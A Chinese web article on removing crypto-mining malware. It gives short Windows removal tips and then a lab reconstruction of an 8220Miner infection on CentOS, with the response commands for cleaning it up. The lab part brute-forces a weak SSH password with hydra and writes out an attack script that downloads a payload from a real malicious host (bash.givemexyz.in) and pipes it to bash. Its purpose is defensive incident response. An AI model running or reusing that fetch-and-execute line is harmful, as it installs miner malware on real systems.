计算机如何清除挖矿病毒，如何查杀挖矿病毒（一次挖矿病毒的处理过程复盘）

关于【计算机如何清除挖矿病毒】:计算机如何清除挖矿病毒，今天小编给您分享一下，如果对您有所帮助别忘了关注本站哦。

• 内容导航：
• 1、计算机如何清除挖矿病毒
• 2、一次挖矿病毒的处理过程复盘

1、计算机如何清除挖矿病毒

　　币的兴起，让挖矿出现在大众眼前，然而，很多不法人员却利用电脑技术给别人下病毒，帮助自己挖矿，如果电脑中了这种病毒我们该如何。

　　首先，如果是菜鸟写出的病毒，大家可以太任务管理器中，找到该文件路径，直接终结进程树，或直接找到路径删除即可。

　　第二，如果对方技术够本，我们很难终结进程，那么，我们可以下载一个电脑管家，现在的电脑管家也增大了挖矿病毒的扫描率，如果查找到直接清理即可。

　　第三，如果电脑管家也无法搞定那么，我们可以avast查杀，这个程序在杀毒方面，简直是第一，对于挖矿病毒来说，更是犹如利剑。

　　第四，如果使用avast之后，我们还怀疑电脑有挖矿病毒的话，我们先打开进程手动把文档路径放到隔离区。

　　第五，在放到隔离区之后，我们使用avast的放松以供分析，然后发给avast的工作员工，备注怀疑是挖矿病毒，对方给我们人工分析，如果是，对方也会帮我们删除。

　　第六，如果在专业坚定之后，我们还有所怀疑的话，如果不是大牛，那么，大舅就需要重装电脑了，毕竟，一装百物清。

2、一次挖矿病毒的处理过程复盘

一、挖矿病毒的小科普

挖矿病毒可以说是安全圈的“老熟人”了，各类安全事件一直不乏它们活跃的身影。亚信安全发布的《2020年度安全威胁回顾及预测》显示：2020年，挖矿病毒持续活跃，不仅老病毒出现频繁更新，而且还出现了多个新型挖矿病毒。其中，有隐藏在Linux设备的计划任务中，通过定时任务的方式下载并执行挖矿程序和“海啸”后门程序 ，发动DDoS攻击；还有WMI无文件挖矿实现双平台感染；伪装成系统文件的XMRDoor挖矿病毒；以及利用“新冠病毒”邮件传播的“LemonDuck”无文件挖矿病毒。

而进入2021年，针对发展中国家的挖矿病毒攻击更是呈上涨态势。究其原因，如印度、泰国等国家在网络安全方面投入成本较低，人员安全意识比较薄弱，挖矿病毒攻击成功概率较高。此外，制造业、政府、医疗、金融等行业依然是挖矿病毒的主要攻击目标

可以看一下这个科普小视频快速了解《什么是挖矿病毒》

视频来自：https://mp.weixin.qq.com/s/RuWx1KDvJSUby416KBnxmQ

2、本次中招的挖矿病毒为

http://bash.givemexyz.in/xmsdbused木马

处理过程参考了如下连接

https://zhuanlan.zhihu.com/p/376610910

https://cloud.tencent.com/developer/article/1853002

三、挖矿木马清理复盘

为了复盘，我这里准备kali及测试服务器模拟挖矿病毒入侵及查杀清理的过程

本次中招的挖矿病毒为8220Miner挖矿病毒家族

病毒木马一般会利用高危漏洞和弱口令进行入侵

Kali 192.168.31.15

CentOS7.9 192.168.31.232

1、CentOS7服务器上存在弱口令系统账号admin

模拟弱口令用户admin

(图片可点击放大查看)

2、弱口令暴力破解

hydra工具暴力破解admin用户弱密码就是admin

(图片可点击放大查看)

3、Kali 机器上准备挖矿病毒

cat /opt/Miner_virus.sh #!/bin/bashcd /home/admin;(curl -fsSL http://bash.givemexyz.in/xms||wget -q -O- http://bash.givemexyz.in/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("http://bash.givemexyz.in/xms").read()')| bash -sh; lwp-download http://bash.givemexyz.in/xms /xms; bash /xms; /xms; rm -rf /xms

(图片可点击放大查看)

4、接下来进行攻击入侵

ssh admin@192.168.31.232 < /opt/Miner_virus.sh

输入弱口令admin

(图片可点击放大查看)

等待脚本执行

(图片可点击放大查看)

说明：当然挖矿病毒黑产团队的入侵手段肯定比我这种要高级太多

上面只是简单模拟

5、很快这台机器很快就中招了

CPU100%

(图片可点击放大查看)

可见弱口令被攻击的成本真的很低

6、接下进行应急响应查杀

ps -ef | grep dbusedll /proc/17743/exe

可以看到/tmp目录下有不少恶意程序文件

cd /tmpls -al

(图片可点击放大查看)

7、先改掉弱密码，杀掉进程

passwd adminkill -9 PID

(图片可点击放大查看)

8、删掉恶意程序文件

cd /tmpls -alrm -rf bashirc dbused .lock .pwn .python

(图片可点击放大查看)

(图片可点击放大查看)

9、别太乐观

你以为就完事了，不，你错了， 人家也不是吃素的

隔一会top查看CPU又100%了

(图片可点击放大查看)

检查异常进程ps -ef

(图片可点击放大查看)

检查admin用户的crontabsu -admin crontab -l

(图片可点击放大查看)

ps -ef | grep admin

异常进程都是admin用户在运行

(图片可点击放大查看)

• 再次杀异常进程

ps -ef | grep "dbused"| awk '{print $2}'| xargs killps -ef | grep "bashirc"| awk '{print $2}'| xargs killps -ef | grep admin | grep giveme | awk '{print $2}'| xargs kill

(图片可点击放大查看)

• 删掉恶意程序文件

rm -rf bashirc dbused .lock .pwn .python

(图片可点击放大查看)

admin用户的定时任务清理

(图片可点击放大查看)

.bash_profile 文件清理

cat /home/admin/.bash_profile

(图片可点击放大查看)

10、也学习挖矿病毒的套路进行抑制

如果再观察top CPU还是100%的话 可能就要献上大招了

1）vi /etc/hosts 解析成不通的地址

(图片可点击放大查看)

2）定时任务杀进程并清理

脚本如下

/opt/virus_clear.sh#!/bin/bashLOCK=/var/log/virus_clear.logecho "清理日期:" >> ${LOCK} 2>&1echo `date '+%Y-%m-%d_%T'` >> ${LOCK} 2>&1echo "=================Virus Clear Start===============================" >> ${LOCK} 2>&1ps -ef | grep "dbused"| awk '{print $2}'| xargs kill >> ${LOCK} 2>&1ps -ef | grep "bashirc"| awk '{print $2}'| xargs kill >> ${LOCK} 2>&1ps -ef | grep admin | grep giveme | awk '{print $2}'| xargs kill >> ${LOCK} 2>&1rm -rf /tmp/bashirc /tmp/dbused /tmp/.lock /tmp/.pwn /tmp/.python >> ${LOCK} 2>&1echo > /var/spool/cron/admin >> ${LOCK} 2>&1

记得脚本添加执行权限

crontab -e

设置定时任务

(图片可点击放大查看)

这样为减少业务带来的影响，先恢复业务，为溯源和百度求证完全清理赢得时间

3)出口防火墙上封锁矿池IOC地址

4)移走/usr/bin/curl和/usr/bin/wget命令

(图片可点击放大查看)

前提是你的业务程序不需要使用到这两个命令

如果是root弱密码或其他漏洞进行bash提权进行入侵的话，清理难度就比我上面的要大

可以研究一下具体木马脚本里注入了哪些地方

(图片可点击放大查看)

(图片可点击放大查看)

(图片可点击放大查看)

四、总结

不过也遇到过kdevtmpfsi和startMiner新型变种挖矿木马，这种清理就相比上面复杂一些

可以参考如下文章进行处理

• 《记一次套路较深的双家族挖矿事件应急响应》

https://www.freebuf.com/articles/network/280004.html

• 《应急响应案例：kdevtmpfsi挖矿木马》

https://cloud.tencent.com/developer/article/1744547

• 《从一次攻击溯源中暴露的安全问题》

https://cloud.tencent.com/developer/article/1796933

• #挖矿木马

https://mp.weixin.qq.com/mp/appmsgalbum?__biz=MzI5ODk3OTM1Ng==&action=getalbum&album_id=1886143538539593741&scene=173&from_msgid=2247499275&from_itemidx=1&count=3&nolastread=1#wechat_redirect

• 《挖矿木马自助清理手册》

https://cloud.tencent.com/developer/article/1834731

本文关键词：如何查杀挖矿病毒，怎么清除挖矿病毒，计算机如何清除挖矿病毒记录，windows挖矿病毒怎么处理，windows挖矿病毒查杀。这就是关于《计算机如何清除挖矿病毒，如何查杀挖矿病毒（一次挖矿病毒的处理过程复盘）》的所有内容，希望对您能有所帮助！

本文链接：https://bk.89qw.com/a-570150